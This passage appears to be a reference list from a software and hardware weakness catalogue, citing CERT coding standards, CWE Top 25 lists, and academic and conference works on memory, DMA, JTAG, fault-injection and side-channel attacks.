GeeksforGeeks + Virtual Destructor + https://www.geeksforgeeks.org/virtual-destructor/ + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 01. Preprocessor (PRE) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151965 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 02. Declarations and Initialization (DCL) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151966 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 03. Expressions (EXP) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151976 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec. 04. Integers (INT) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151979 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 05. Floating Point (FLP) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151969 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 06. Arrays (ARR) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151972 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 07. Characters and Strings (STR) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151974 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec. 08. Memory Management (MEM) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151930 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 09. Input Output (FIO) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151932 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec. 10. Environment (ENV) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151968 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 11. Signals (SIG) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151975 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 12. Error Handling (ERR) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151977 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 13. Application Programming Interfaces (API) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151980 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 14. Concurrency (CON) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151970 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 48. Miscellaneous (MSC) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151973 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 50. POSIX (POS) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151931 + + + The Software Engineering Institute + SEI CERT C Coding Standard : Rec 51. Microsoft Windows (WIN) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151933 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rec 00. Input Validation and Data Sanitization (IDS) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487337 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rec 01. Declarations and Initialization (DCL) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487329 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rec 02. Expressions (EXP) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487331 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rec 03. Numeric Types and Operations (NUM) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487335 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rec 04. Characters and Strings (STR) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487333 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rec 05. Object Orientation (OBJ) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487353 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rec 06. Methods (MET) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487336 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rec 07. Exceptional Behavior (ERR) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487338 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rec 13. Input Output (FIO) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487330 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rec 15. Platform Security (SEC) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487332 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rec 49. Miscellaneous (MSC) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487351 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rec 18. Concurrency (CON) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487352 + + + Wikipedia + Computational complexity theory) + https://en.wikipedia.org/wiki/Computational_complexity_theory + + + Tim Rains + Microsoft's Free Security Tools - banned.h + 2012 + --08 + ---30 + https://www.microsoft.com/en-us/security/blog/2012/08/30/microsofts-free-security-tools-banned-h/ + 2023-04-07 + + + Michael Howard + Microsoft's Free Security Tools - banned.h + 2011 + --06 + https://www.microsoft.com/en-us/security/blog/2012/08/30/microsofts-free-security-tools-banned-h/ + 2023-04-07 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard + https://wiki.sei.cmu.edu/confluence/display/perl/SEI+CERT+Perl+Coding+Standard + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rule 01. Input Validation and Data Sanitization (IDS) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890533 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rule 02. Declarations and Initialization (DCL) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890509 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rule 03. Expressions (EXP) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890504 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rule 04. Integers (INT) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890508 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rule 05. Strings (STR) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890507 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rule 06. Object-Oriented Programming (OOP) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890501 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rule 07. File Input and Output (FIO) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890499 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rule 50. Miscellaneous (MSC) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890497 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rec. 01. Input Validation and Data Sanitization (IDS) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890568 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rec. 02. Declarations and Initialization (DCL) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890569 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rec. 03. Expressions (EXP) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890559 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rec. 04. Integers (INT) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890560 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rec. 05. Strings (STR) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890563 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rec. 06. Object-Oriented Programming (OOP) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890561 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rec. 07. File Input and Output (FIO) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890496 + + + The Software Engineering Institute + SEI CERT Perl Coding Standard : Rule 50. Miscellaneous (MSC) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890502 + + + 2019 CWE Top 25 Most Dangerous Software Errors + 2019 + --09 + ---16 + http://cwe.mitre.org/top25/archive/2019/2019_cwe_top25.html + + + Aleph One + Smashing The Stack For Fun And Profit + 1996 + --11 + ---08 + http://phrack.org/issues/49/14.html + + + Eldar Marcussen + Security issues with using PHP's escapeshellarg + 2013 + --11 + ---13 + https://baesystemsai.blogspot.com/2013/11/security-issues-with-using-phps.html + + + Null pointer / Null dereferencing + 2019 + --07 + ---15 + Wikipedia + https://en.wikipedia.org/wiki/Null_pointer#Null_dereferencing + + + Null Reference Creation and Null Pointer Dereference + Apple + https://developer.apple.com/documentation/xcode/null-reference-creation-and-null-pointer-dereference + 2023-04-07 + + + NULL Pointer Dereference [CWE-476] + 2012 + --09 + ---11 + ImmuniWeb + https://www.immuniweb.com/vulnerability/null-pointer-dereference.html + + + Raoul Strackx + Yves Younan + Pieter Philippaerts + Frank Piessens + Sven Lachmund + Thomas Walter + Breaking the memory secrecy assumption + 2009 + --03 + ---31 + ACM + https://dl.acm.org/doi/10.1145/1519144.1519145 + 2023-04-07 + + + Fermin J. Serna + The info leak era on software exploitation + 2012 + --07 + ---25 + https://media.blackhat.com/bh-us-12/Briefings/Serna/BH_US_12_Serna_Leak_Era_Slides.pdf + + + Ali Abbasi and Majid Hashemi + Ghost in the PLC Designing an Undetectable Programmable Logic Controller Rootkit via Pin Control Attack + 2016 + https://www.blackhat.com/docs/eu-16/materials/eu-16-Abbasi-Ghost-In-The-PLC-Designing-An-Undetectable-Programmable-Logic-Controller-Rootkit-wp.pdf + + + Kurt Rosenfeld + Ramesh Karri + Attacks and Defenses for JTAG + 2010 + --02 + https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=5406671 + + + DMA attack + 2019 + --10 + ---19 + https://en.wikipedia.org/wiki/DMA_attack + + + A. Theodore Markettos + Colin Rothwell + Brett F. Gutstein + Allison Pearce + Peter G. Neumann + Simon W. Moore + Robert N. M. Watson + Thunderclap: Exploring Vulnerabilities in Operating System IOMMU Protection via DMA from Untrustworthy Peripherals + 2019 + --02 + ---25 + https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_05A-1_Markettos_paper.pdf + + + Maximillian Dornseif + Michael Becher + Christian N. Klein + FireWire all your memory are belong to us + 2005 + http://www.orkspace.net/secdocs/Conferences/CanSecWest/2005/0wn3d%20by%20an%20iPod%20-%20Firewire1394%20Issues.pdf + 2023-04-07 + + + Rory Breuk + Albert Spruyt + Adam Boileau + Integrating DMA attacks in exploitation frameworks + 2012 + --02 + ---20 + https://www.os3.nl/_media/2011-2012/courses/rp1/p14_report.pdf + + + Maximillian Dornseif + Owned by an iPod + 2004 + https://web.archive.org/web/20060505224959/https://pacsec.jp/psj04/psj04-dornseif-e.ppt + 2023-04-07 + + + Gopal Vishwakarma + Wonjun Lee + Exploiting JTAG and Its Mitigation in IOT: A Survey + 2018 + --12 + ---03 + https://www.mdpi.com/1999-5903/10/12/121/pdf + 2023-04-07 + + + Dmytro Oleksiuk + My aimful life + 2015 + --09 + ---12 + http://blog.cr4.sh/2015/09/breaking-uefi-security-with-software.html + + + PCILeech + 2019 + --10 + ---19 + https://github.com/ufrisk/pcileech + + + A. Theodore Markettos + Adam Boileau + Hit by a Bus:Physical Access Attacks with Firewire + 2006 + https://security-assessment.com/files/presentations/ab_firewire_rux2k6-final.pdf + + + Wikipedia + General Data Protection Regulation + https://en.wikipedia.org/wiki/General_Data_Protection_Regulation + + + State of California Department of Justice, Office of the Attorney General + California Consumer Privacy Act (CCPA) + https://oag.ca.gov/privacy/ccpa + + + Wikipedia + Parasitic computing + https://en.wikipedia.org/wiki/Parasitic_computing + + + WASC + Insecure Indexing + http://projects.webappsec.org/w/page/13246937/Insecure%20Indexing + + + Oracle Java Documentation + https://docs.oracle.com/javase/1.5.0/docs/guide/language/autoboxing.html + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 02. Expressions (EXP) + https://wiki.sei.cmu.edu/confluence/display/java/EXP04-J.+Do+not+pass+arguments+to+certain+Java+Collections+Framework+methods+that+are+a+different+type+than+the+collection+parameter+type + + + NIST + Digital Identity Guidelines (SP 800-63B) + 2017 + --06 + https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf + 2023-04-07 + + + Peter Gutmann + Data Remanence in Semiconductor Devices + 10th USENIX Security Symposium + 2001 + --08 + https://www.usenix.org/legacy/events/sec01/full_papers/gutmann/gutmann.pdf + + + F-Secure Labs + Multiple Vulnerabilities in Barco Clickshare: JTAG access is not permanently disabled + https://labs.f-secure.com/advisories/multiple-vulnerabilities-in-barco-clickshare/ + + + Kurt Rosenfeld + Ramesh Karri + Attacks and Defenses for JTAG + https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=5406671 + + + Moinuddin Qureshi + Michele Franchescini + Vijayalakshmi Srinivasan + Luis Lastras + Bulent Abali + John Karidis + Enhancing Lifetime and Security of PCM-Based Main Memory with Start-Gap Wear Leveling + https://researcher.watson.ibm.com/researcher/files/us-moinqureshi/papers-sgap.pdf + 2023-04-07 + + + Micron + Bad Block Management in NAND Flash Memory + https://www.micron.com/-/media/client/global/documents/products/technical-note/nand-flash/tn2959_bbm_in_nand_flash.pdf + + + Farimah Farahmandi + Prabhat Mishra + FSM Anomaly Detection using Formal Analysis + https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=8119228&tag=1 + + + Keith Bowman + James Tschanz + Chris Wilkerson + Shih-Lien Lu + Tanay Karnik + Vivek De + Shekhar Borkar + Circuit Techniques for Dynamic Variation Tolerance + https://dl.acm.org/doi/10.1145/1629911.1629915 + 2023-04-07 + + + Dan Ernst + Nam Sung Kim + Shidhartha Das + Sanjay Pant + Rajeev Rao + Toan Pham + Conrad Ziesler + David Blaauw + Todd Austin + Krisztian Flautner + Trevor Mudge + Razor: A Low-Power Pipeline Based on Circuit-Level Timing Speculation + https://web.eecs.umich.edu/~taustin/papers/MICRO36-Razor.pdf + + + James Tschanz + Keith Bowman + Steve Walstra + Marty Agostinelli + Tanay Karnik + Vivek De + Tunable Replica Circuits and Adaptive Voltage-Frequency Techniques for Dynamic Voltage, Temperature, and Aging Variation Tolerance + https://ieeexplore.ieee.org/document/5205410 + + + Bilgiday Yuce + Nahid F. Ghalaty + Chinmay Deshpande + Conor Patrick + Leyla Nazhandali + Patrick Schaumont + FAME: Fault-attack Aware Microprocessor Extensions for Hardware Fault Detection and Software Fault Response + https://dl.acm.org/doi/10.1145/2948618.2948626 + 2023-04-07 + + + Keith A. Bowman + James W. Tschanz + Shih-Lien L. Lu + Paolo A. Aseron + Muhammad M. Khellah + Arijit Raychowdhury + Bibiche M. Geuskens + Carlos Tokunaga + Chris B. Wilkerson + Tanay Karnik + Vivek De + A 45 nm Resilient Microprocessor Core for Dynamic Variation Tolerance + https://ieeexplore.ieee.org/document/5654663 + + + Niek Timmers + Albert Spruyt + Bypassing Secure Boot Using Fault Injection + https://www.blackhat.com/docs/eu-16/materials/eu-16-Timmers-Bypassing-Secure-Boot-Using-Fault-Injection.pdf + + + Brian Bailey + Why Chips Die + https://semiengineering.com/why-chips-die/ + + + V. Lakshminarayan + What causes semiconductor devices to fail + Original + 2023-04-07 + + + Tanakorn Leesatapornwongsa + Jeffrey F. Lukman + Shan Lu + Haryadi S. Gunawi + TaxDC: A Taxonomy of Non-Deterministic Concurrency Bugs + in Datacenter Distributed Systems + 2016 + https://ucare.cs.uchicago.edu/pdf/asplos16-TaxDC.pdf + + + Tony Martin + Ghost in the Shell Weakness + 2020 + --02 + ---13 + https://friendsglobal.com/ghost-in-the-shell/ghost-in-the-shell-weakness/ + 2023-04-07 + + + Ali Abbasi + Tobias Scharnowski + Thorsten Holz + Doors of Durin: The Veiled Gate to Siemens S7 Silicon + https://i.blackhat.com/eu-19/Wednesday/eu-19-Abbasi-Doors-Of-Durin-The-Veiled-Gate-To-Siemens-S7-Silicon.pdf + + + Sergei Skorobogatov + Christopher Woods + Breakthrough Silicon Scanning Discovers Backdoor in Military Chip + https://www.cl.cam.ac.uk/~sps32/Silicon_scan_draft.pdf + + + Chris Domas + God Mode Unlocked: Hardware Backdoors in x86 CPUs + https://i.blackhat.com/us-18/Thu-August-9/us-18-Domas-God-Mode-Unlocked-Hardware-Backdoors-In-x86-CPUs.pdf + + + Jonathan Brossard + Hardware Backdooring is Practical + https://media.blackhat.com/bh-us-12/Briefings/Brossard/BH_US_12_Brossard_Backdoor_Hacking_Slides.pdf + + + Sergei Skorabogatov + Security, Reliability, and Backdoors + https://www.cl.cam.ac.uk/~sps32/SG_talk_SRB.pdf + + + ARM + Cortex-R4 Manual + https://developer.arm.com/Processors/Cortex-M4 + 2023-04-07 + + + Intel + MCS 51 Microcontroller Family User's Manual + http://web.mit.edu/6.115/www/document/8051.pdf + + + ARM + Memory Protection Unit (MPU) + https://web.archive.org/web/20200630034848/https://static.docs.arm.com/100699/0100/armv8m_architecture_memory_protection_unit_100699_0100_00_en.pdf + 2023-04-07 + + + Joe Fitzpatrick + SCA4n00bz - Timing-based Sidechannel Attacks for Hardware N00bz workshop + https://github.com/securelyfitz/SCA4n00bz + + + Christopher Tarnovsky + Security Failures in Secure Devices + https://www.blackhat.com/presentations/bh-europe-08/Tarnovsky/Presentation/bh-eu-08-tarnovsky.pdf + + + Kit Murdock + David Oswald + Flavio D Garcia + Jo Van Bulck + Frank Piessens + Daniel Gruss + Plundervolt + https://plundervolt.com/ + + + Adrian Tang + Simha Sethumadhavan + Salvatore Stolfo + CLKSCREW: Exposing the Perils of Security-Oblivious Energy Management + https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-tang.pdf + + + Yoongu Kim + Ross Daly + Jeremie Kim + Ji Hye Lee + Donghyuk Lee + Chris Wilkerson + Konrad Lai + Onur Mutlu + Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors + https://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf + + + Gopal Vishwakarma + Wonjun Lee + JTAG Explained (finally!): Why "IoT", Software Security Engineers, and Manufacturers Should Care + https://www.mdpi.com/1999-5903/10/12/121/pdf + 2023-04-07 + + + Bob Molyneaux + Mark McDermott + Anil Sabbavarapu + Design for Testability & Design for Debug + http://users.ece.utexas.edu/~mcdermot/vlsi-2/Lecture_17.pdf + + + Fan Wang + Vishwani D. Agrawal + Single Event Upset: An Embedded Tutorial + https://www.eng.auburn.edu/~agrawvd/TALKS/tutorial_6pg.pdf + + + P. D. Bradley + E. Normand + Single Event Upsets in Implantable Cardioverter Defibrillators + https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=736549&tag=1 + 2023-04-07 + + + Melanie Berg + Kenneth LaBel + Jonathan Pellish + Single Event Effects in FPGA Devices 2015-2016 + https://ntrs.nasa.gov/search.jsp?R=20160007754 + + + Cisco + Cisco 12000 Single Event Upset Failures Overview and Work Around Summary + https://www.cisco.com/c/en/us/support/docs/field-notices/200/fn25994.html + + + Cypress + Different Ways to Mitigate Soft Errors in Asynchronous SRAMs - KBA90939 + https://community.infineon.com/t5/Knowledge-Base-Articles/Different-Ways-to-Mitigate-Soft-Errors-in-Asynchronous-SRAMs-KBA90939/ta-p/257944 + 2023-04-07 + + + Ian Johnston + Cosmic particles can change elections and cause plans to fall through the sky, scientists warn + https://www.independent.co.uk/news/science/subatomic-particles-cosmic-rays-computers-change-elections-planes-autopilot-a7584616.html + + + Shahed E. Quadir + Junlin Chen + Domenic Forte + Navid Asadizanjani + Sina Shahbazmohamadi + Lei Wang + John Chandy + Mark Tehranipoor + A Survey on Chip to System Reverse Engineering + https://dl.acm.org/doi/pdf/10.1145/2755563 + 2023-04-07 + + + Brandon Hill + Huge Intel CPU Bug Allegedly Causes Kernel Memory Vulnerability With Up To 30% Performance Hit In Windows And Linux + 2018 + --01 + ---02 + https://hothardware.com/news/intel-cpu-bug-kernel-memory-isolation-linux-windows-macos + 2023-04-07 + + + Christopher Domas + Breaking the x86 ISA + https://github.com/xoreaxeaxeax/sandsifter/blob/master/references/domas_breaking_the_x86_isa_wp.pdf + + + Matthew Hughes + Bad news: KeyWe Smart Lock is easily bypassed and can't be fixed + 2019 + --12 + ---11 + https://www.theregister.com/2019/12/11/f_secure_keywe/ + 2023-04-07 + + + Alex Scroxton + Alarm bells ring, the IoT is listening + https://www.computerweekly.com/news/252475324/Alarm-bells-ring-the-IoT-is-listening + + + Brian Krebs + Zyxel Flaw Powers New Mirai IoT Botnet Strain + 2020 + --03 + ---20 + https://krebsonsecurity.com/2020/03/zxyel-flaw-powers-new-mirai-iot-botnet-strain/ + + + Jack Tang + Root Cause Analysis of CVE-2014-1772 - An Internet Explorer Use After Free Vulnerability + 2014 + --11 + ---05 + https://www.trendmicro.com/en_us/research.html + 2023-04-07 + + + Simon Zuckerbraun + It's Time To Terminate The Terminator + 2018 + --05 + ---15 + https://www.zerodayinitiative.com/blog/2018/5/15/its-time-to-terminate-the-terminator + + + Christopher Domas + The Memory Sinkhole + 2015 + --07 + ---20 + https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf + + + Anders B. Wilhelmsen + Eivind S. Kristiansen + Marie Moe + The Hard-coded Key to my Heart - Hacking a Pacemaker Programmer + 2019 + --08 + ---10 + https://anderbw.github.io/2019-08-10-DC27-Biohacking-pacemaker-programmer.pdf + + + Chetan Conikee + Case Files from 20 Years of Business Logic Flaws + 2020 + --02 + https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18217/2020_USA20_DSO-R02_01_Case%20Files%20from%2020%20Years%20of%20Business%20Logic%20Flaws.pdf + + + Lucian Armasu + Intel ME's Undocumented Manufacturing Mode Suggests CPU Hacking Risks + 2018 + --10 + ---03 + https://www.tomshardware.com/news/intel-me-cpu-undocumented-manufacturing-mode,37883.html + + + M. West + M. Goodwin + SameSite attribute specification draft + 2016 + --04 + ---06 + https://datatracker.ietf.org/doc/html/draft-west-first-party-cookies-07 + 2023-04-07 + + + Mozilla + SameSite attribute description on MDN Web Docs + 2020 + --06 + ---20 + https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite + + + The Chromium Projects + Chromium support for SameSite attribute + 2019 + --09 + ---26 + https://www.chromium.org/updates/same-site/ + 2023-04-07 + + + Intel Corporation + PCIe Device Measurement Requirements + 2018 + --09 + https://www.intel.com/content/dam/www/public/us/en/documents/reference-guides/pcie-device-security-enhancements.pdf + + + Intel Corporation + Deep Dive: Retpoline: A Branch Target Injection Mitigation + https://www.intel.com/content/www/us/en/developer/topic-technology/software-security-guidance/overview.html + 2023-04-07 + + + LANGSEC: Language-theoretic Security + http://langsec.org/ + + + LangSec: Recognition, Validation, and Compositional Correctness for Real World Security + http://langsec.org/bof-handout.pdf + + + Sergey Bratus + Lars Hermerschmidt + Sven M. Hallberg + Michael E. Locasto + Falcon D. Momot + Meredith L. Patterson + Anna Shubina + Curing the Vulnerable Parser: Design Patterns for Secure Input Handling + USENIX ;login: + 2017 + https://www.usenix.org/system/files/login/articles/login_spring17_08_bratus.pdf + + + Android Security Bulletin - December 2018 + https://source.android.com/security/bulletin/2018-12-01.html + 2023-04-07 + + + Muhammad Yasin + Abhrajit Sengupta + Mohammed Thari Nabeel + Mohammed Ashraf + Jeyavijayan (JV) Rajendran + Ozgur Sinanoglu + Provably-Secure Logic Locking: From Theory To Practice + https://dl.acm.org/doi/10.1145/3133956.3133985 + 2023-04-07 + + + Muhammad Yasin + Jeyavijayan (JV) Rajendran + Ozgur Sinanoglu + Trustworthy Hardware Design: Combinational Logic Locking Techniques + https://link.springer.com/book/10.1007/978-3-030-15334-2 + 2023-04-07 + + + Meher Krishna Patel + FPGA designs with Verilog (section 7.4 Glitches) + https://verilogguide.readthedocs.io/en/latest/verilog/fsm.html + + + Clifford E. Cummings + Non-Blocking Assignments in Verilog Synthesis, Coding Styles that Kill! + 2000 + http://www.sunburst-design.com/papers/CummingsSNUG2000SJ_NBA.pdf + + + Paul Kocher + Joshua Jaffe + Benjamin Jun + Introduction to differential power analysis and related attacks + 1998 + https://www.rambus.com/wp-content/uploads/2015/08/DPATechInfo.pdf + + + Dakshi Agrawal + Bruce Archambeault + Josyula R. Rao + Pankaj Rohatgi + The EM Side-Channel(s) + 2007 + --08 + ---24 + https://link.springer.com/content/pdf/10.1007/3-540-36400-5_4.pdf + 2023-04-07 + + + Daniel Genkin + Adi Shamir + Eran Tromer + RSA key extraction via low-bandwidth acoustic cryptanalysis + 2014 + --06 + ---13 + https://www.iacr.org/archive/crypto2014/86160149/86160149.pdf + + + Colin O'Flynn + Power Analysis for Cheapskates + 2013 + --01 + ---24 + https://media.blackhat.com/eu-13/briefings/OFlynn/bh-eu-13-for-cheapstakes-oflynn-wp.pdf + + + Moritz Lipp + Michael Schwarz + Daniel Gruss + Thomas Prescher + Werner Haas + Anders Fogh + Jann Horn + Stegfan Mangard + Paul Kocher + Daniel Genkin + Yuval Yarom + Mike Hamberg + Meltdown: Reading Kernel Memory from User Space + 2018 + --01 + ---03 + https://meltdownattack.com/meltdown.pdf + + + Moritz Lipp + Michael Schwarz + Daniel Gruss + Thomas Prescher + Werner Haas + Anders Fogh + Jann Horn + Stegfan Mangard + Paul Kocher + Daniel Genkin + Yuval Yarom + Mike Hamberg + Spectre Attacks: Exploiting Speculative Execution + 2018 + --01 + ---03 + https://spectreattack.com/spectre.pdf + + + Dmitry Evtyushkin + Dmitry Ponomarev + Nael Abu-Ghazaleh + Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR + 2016 + --10 + ---19 + https://ieeexplore.ieee.org/abstract/document/7783743/ + + + Qian Ge + Yuval Yarom + David Cock + Gernot Heiser + A Survey of Microarchitectural Timing Attacks and Countermeasures on Contemporary Hardware + 2016 + --10 + ---24 + https://eprint.iacr.org/2016/613.pdf + + + moparisthebest + Validation Vulnerabilities + 2015 + --06 + ---05 + https://mailarchive.ietf.org/arch/msg/acme/s6Q5PdJP48LEUwgzrVuw_XPKCsM/ + + + Josh Aas + Daniel McCarney + Roland Shoemaker + Multi-Perspective Validation Improves Domain Validation Security + 2020 + --02 + ---19 + https://letsencrypt.org/2020/02/19/multi-perspective-validation.html + + + Miguel Castro + Barbara Liskov + Practical Byzantine Fault Tolerance and Proactive Recovery + 2002 + --11 + ---04 + https://dl.acm.org/doi/pdf/10.1145/571637.571640 + 2023-04-07 + + + Stephan van Schaik + Cristiano Giuffrida + Herbert Bos + Kaveh Razavi + Malicious Management Unit: Why Stopping Cache Attacks in Software is Harder Than You Think + 2018 + --08 + ---15 + https://www.usenix.org/system/files/conference/usenixsecurity18/sec18-van_schaik.pdf + + + Christopher Tarnovsky + Security Failures In Secure Devices + 2008 + --02 + ---21 + https://www.blackhat.com/presentations/bh-dc-08/Tarnovsky/Presentation/bh-dc-08-tarnovsky.pdf + + + Mark Ermolov, Positive Technologies + Intel x86 Root of Trust: loss of trust + 2020 + --03 + ---05 + https://blog.ptsecurity.com/2020/03/intelx86-root-of-trust-loss-of-trust.html + + + John Butterworth + Cory Kallenberg + Xeno Kovah + BIOS Chronomancy: Fixing the Core Root of Trust for Measurement + 2013 + --07 + ---31 + https://media.blackhat.com/us-13/US-13-Butterworth-BIOS-Security-Slides.pdf + + + 2020 CWE Top 25 Most Dangerous Software Weaknesses + 2020 + --08 + ---20 + http://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html + + + Consortium for Information & Software Quality (CISQ) + Automated Source Code Quality Measures + 2020 + https://www.omg.org/spec/ASCQM/ + + + Taku Izumi, Fujitsu Limited + Address Range Memory Mirroring + 2016 + https://www.fujitsu.com/jp/documents/products/software/os/linux/catalog/LinuxConJapan2016-Izumi.pdf + + + Benoit Morgan, Eric Alata, Vincent Nicomette, Mohamed Kaaniche + Bypassing IOMMU Protection against I/O Attacks + 2016 + https://hal.archives-ouvertes.fr/hal-01419962/document + + + Colin L. Rothwell + Exploitation from malicious PCI Express peripherals + 2019 + https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-934.pdf + + + Yuriy Bulygin, Oleksandr Bazhaniuk, Andrew Furtak, John Loucaides, Mikhail Gorobets + BARing the System - New vulnerabilities in Coreboot & UEFI-based Systems + 2017 + https://www.c7zero.info/stuff/REConBrussels2017_BARing_the_system.pdf + + + Stewart Smith + CVE-2019-6260: Gaining control of BMC from the host processor + 2019 + https://www.flamingspork.com/blog/2019/01/23/cve-2019-6260:-gaining-control-of-bmc-from-the-host-processor/ + + + ARM + AMBA APB Protocol Specification, Version 2.0 + 2010 + https://www.eecs.umich.edu/courses/eecs373/readings/IHI0024C_amba_apb_protocol_spec.pdf + + + OCP-IP + Open Core Protocol Specification, Release 2.2 + 2006 + http://read.pudn.com/downloads95/doc/388103/OCPSpecification%202.2.pdf + + + Marc Witteman + Secure Application Programming in the presence of Side Channel Attacks + 2017 + https://riscureprodstorage.blob.core.windows.net/production/2017/08/Riscure_Whitepaper_Side_Channel_Patterns.pdf + 2023-04-07 + + + A. Dehbaoui, J. M. Dutertre, B. Robisson, P. Orsatelli, P. Maurine, A. Tria + Injection of transient faults using electromagnetic pulses. Practical results on a cryptographic system + 2012 + https://eprint.iacr.org/2012/123.pdf + + + A. Menu, S. Bhasin, J. M. Dutertre, J. B. 